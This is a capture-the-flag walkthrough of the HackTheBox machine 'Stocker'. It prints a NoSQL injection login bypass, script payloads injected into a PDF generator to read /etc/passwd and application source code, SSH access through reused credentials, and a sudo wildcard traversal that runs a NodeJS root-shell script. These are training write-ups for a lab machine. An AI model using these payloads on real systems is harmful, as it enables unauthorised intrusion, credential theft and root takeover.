Stocker — HackTheBox

Abdul Wassay (HotPlugin)
4 min readJun 24, 2023

Stocker is an easy machine from HackTheBox. It involves bypassing authentication via NoSQL injection, exploiting HTML injection in PDF generation to read source code from the host containing credentials that leads to foothold. Finally, misconfigured sudo privilege allowing execution of NodeJS scripts leads to shell as root.

NMAP

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3d12971d86bc161683608f4f06e6d54e (RSA)
| 256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
|_ 256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 (HTTP)

Add the domain stocker.htb in the /etc/hosts file and navigate to the website. It is just a static page.

Enumerating for subdomains, we find a subdomain dev.stocker.htb . Add this in the /etc/hosts file.

Navigating to the subdomain, it presents the following login page.

Trying some default credentials doesn’t work. However, the response headers and wappalyzer gives us the idea that this a express application.

After trying some SQL injections payloads, it came to me that this might be using the MongoDB. So, instead i tried the following NoSQL injection payload by setting the Content-Type: application/json header. And it worked.

{"username": {"$ne": null}, "password": {"$ne": null}}

After that it presents the following page where we can add some items in the basket/cart, view them and submit the order.

After submitting the order, it gives the following modal to view the order detail.

And we can see our order details in a PDF file.

HTML Injection

After doing some research, it is found that this vulnerable to HTML injection and can result in LFI. So, looking at the order submit request, it can be seen that we control two fields in the PDF file.

We can try to inject HTML in these field and it successfully works on title.

After doing some search, i came across following article which explains the way the read files via HTML injection.

It used the following payload to read files from system.

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open('GET','file:///etc/passwd');x.send();</script>

Injecting the payload in the title field

We successfully read the /etc/passwd file from the server.

From here, we can see that there’s one user named angoose on the system. I couldn’t read it’s SSH private key. So, instead i read the source code on the application using following payload and found some credentials in it.

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open('GET','file:///var/www/dev/index.js');x.send();</script>

Reusing the password with angoose user, we successfully login via SSH.

Privilege Escalation

Checking for sudo privileges, it seems that we can run NodeJS scrips in the /usr/local/scripts directory.

Looking at the scripts directory, we don’t have write permissions on it. It also contains some scripts but they only have executable permissions.

However doing some search, it can be found that, because there’s a wildcard, we can just enter ../../ to move to other directories and execute any script we want.

So, wrote the following NodeJS script to spawn a shell.

require("child_process").spawn("/bin/bash", ["-p"], {stdio: [0, 1, 2]})

Lastly, executing it with sudo, we get shell as root.

References

--

--